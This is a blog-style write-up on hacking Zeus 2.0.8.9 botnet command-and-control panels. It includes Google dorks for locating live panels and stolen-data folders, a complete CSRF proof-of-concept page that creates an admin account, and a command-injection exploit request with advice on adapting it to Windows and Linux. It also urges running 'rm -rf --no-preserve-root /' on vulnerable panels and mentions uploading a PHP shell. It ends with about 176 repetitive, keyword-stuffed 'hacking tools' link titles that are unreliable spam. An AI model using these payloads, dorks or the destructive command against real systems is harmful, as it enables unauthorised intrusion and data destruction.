Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More info

1. Hacking App
2. Black Hat Hacker Tools
3. Hacking Apps
4. Underground Hacker Sites
5. Hack Tools
6. Hacking Tools Free Download
7. Android Hack Tools Github
8. Hack Rom Tools
9. What Is Hacking Tools
10. Hacking Tools 2019
11. Pentest Box Tools Download
12. Android Hack Tools Github
13. Hacker Tools Mac
14. Hacking Tools Download
15. Hacking Tools For Kali Linux
16. Hacking Tools Download
17. Hacker Tools
18. Hacking App
19. Pentest Tools Bluekeep
20. Hacker Tools For Ios
21. Black Hat Hacker Tools
22. Hack Tools
23. Pentest Tools Port Scanner
24. Pentest Tools Alternative
25. Nsa Hack Tools Download
26. Hack Tool Apk
27. Hacking Tools Online
28. What Is Hacking Tools
29. Pentest Tools
30. Tools Used For Hacking
31. Pentest Tools Review
32. Hacker Tools Linux
33. Hackrf Tools
34. Usb Pentest Tools
35. Blackhat Hacker Tools
36. Hack Tools Mac
37. What Are Hacking Tools
38. Top Pentest Tools
39. How To Install Pentest Tools In Ubuntu
40. Ethical Hacker Tools
41. Hack Tools For Games
42. Pentest Tools Windows
43. Hacking Tools For Pc
44. Hack Tools
45. Pentest Tools For Android
46. Hack Tools 2019
47. Tools 4 Hack
48. Android Hack Tools Github
49. Hacking Tools Windows
50. Pentest Tools Open Source
51. Pentest Tools Linux
52. Hacking Tools Kit
53. Free Pentest Tools For Windows
54. Hacker Tools For Ios
55. Pentest Tools Windows
56. New Hacker Tools
57. Hacker Tools Apk Download
58. Game Hacking
59. Install Pentest Tools Ubuntu
60. Hacking Tools For Kali Linux
61. Pentest Tools Kali Linux
62. Hack Tools For Mac
63. Nsa Hack Tools Download
64. Hacking Tools For Windows Free Download
65. Pentest Tools Url Fuzzer
66. Hack Tools 2019
67. Beginner Hacker Tools
68. Hacker Tools For Mac
69. Pentest Tools For Mac
70. Hacking Tools Usb
71. Hacking Tools Windows
72. Hack Tools Pc
73. How To Make Hacking Tools
74. Pentest Tools Port Scanner
75. Nsa Hack Tools
76. Pentest Tools Website Vulnerability
77. What Are Hacking Tools
78. Black Hat Hacker Tools
79. Hacker Tools 2020
80. Android Hack Tools Github
81. Pentest Tools Website Vulnerability
82. Pentest Tools Linux
83. New Hack Tools
84. Hacker Tools For Ios
85. Hack App
86. Physical Pentest Tools
87. Pentest Tools
88. Hack Tools
89. Growth Hacker Tools
90. Hacker Hardware Tools
91. Wifi Hacker Tools For Windows
92. Pentest Tools Download
93. Hacking Tools Windows
94. Hacking Tools For Mac
95. Hack Tools For Mac
96. Hacker Tools For Ios
97. Beginner Hacker Tools
98. Tools 4 Hack
99. Hack Tools Online
100. Hacking Tools Mac
101. Hacking Tools Github
102. Hacker Tools Free
103. Pentest Tools Tcp Port Scanner
104. Hack Tools Github
105. Hacker Tools Apk Download
106. Hacker Tools 2019
107. Growth Hacker Tools
108. Pentest Tools Android
109. Computer Hacker
110. Pentest Tools For Windows
111. Pentest Automation Tools
112. Tools For Hacker
113. Blackhat Hacker Tools
114. Hacker Tools 2020
115. Hack Tools For Windows
116. Hack Tools Online
117. Hack Tools For Windows
118. Top Pentest Tools
119. Pentest Tools Port Scanner
120. Pentest Automation Tools
121. Nsa Hacker Tools
122. Hack Tools Mac
123. Hacker Techniques Tools And Incident Handling
124. Hacking Tools For Windows Free Download
125. Blackhat Hacker Tools
126. Hack Tools Github
127. Kik Hack Tools
128. Usb Pentest Tools
129. Pentest Tools Website Vulnerability
130. Pentest Automation Tools
131. Pentest Tools Github
132. Pentest Tools Nmap
133. Hack Tools 2019
134. Hacker Search Tools
135. Install Pentest Tools Ubuntu
136. Growth Hacker Tools
137. Hacker Tools Apk
138. Pentest Tools Review
139. Hacker Tools Free Download
140. Hacking Tools Windows
141. Pentest Tools Apk
142. Pentest Reporting Tools
143. Usb Pentest Tools
144. Pentest Reporting Tools
145. Hack Tools Pc
146. Bluetooth Hacking Tools Kali
147. Hacking Tools Online
148. Pentest Tools Download
149. Hacker Search Tools
150. Hacking Tools Github
151. Hacking Tools Hardware
152. Hacking Tools For Pc
153. Best Pentesting Tools 2018
154. Pentest Tools Framework
155. Hacking Tools For Windows
156. World No 1 Hacker Software
157. Pentest Tools Website Vulnerability
158. Pentest Tools Online
159. Hacker Tools 2019
160. Hacker Tools 2020
161. Hack Tools 2019
162. Nsa Hacker Tools
163. Game Hacking
164. Hacking Tools Usb
165. Hacker Tools Mac
166. Hacking Tools For Mac
167. Hacker Tools Apk Download
168. Pentest Tools Website
169. Pentest Tools Free
170. Pentest Tools List
171. Pentest Tools Free
172. Hacking Tools Windows 10
173. Hacking Tools Software
174. Pentest Tools Open Source
175. How To Install Pentest Tools In Ubuntu
176. Hack Tools For Games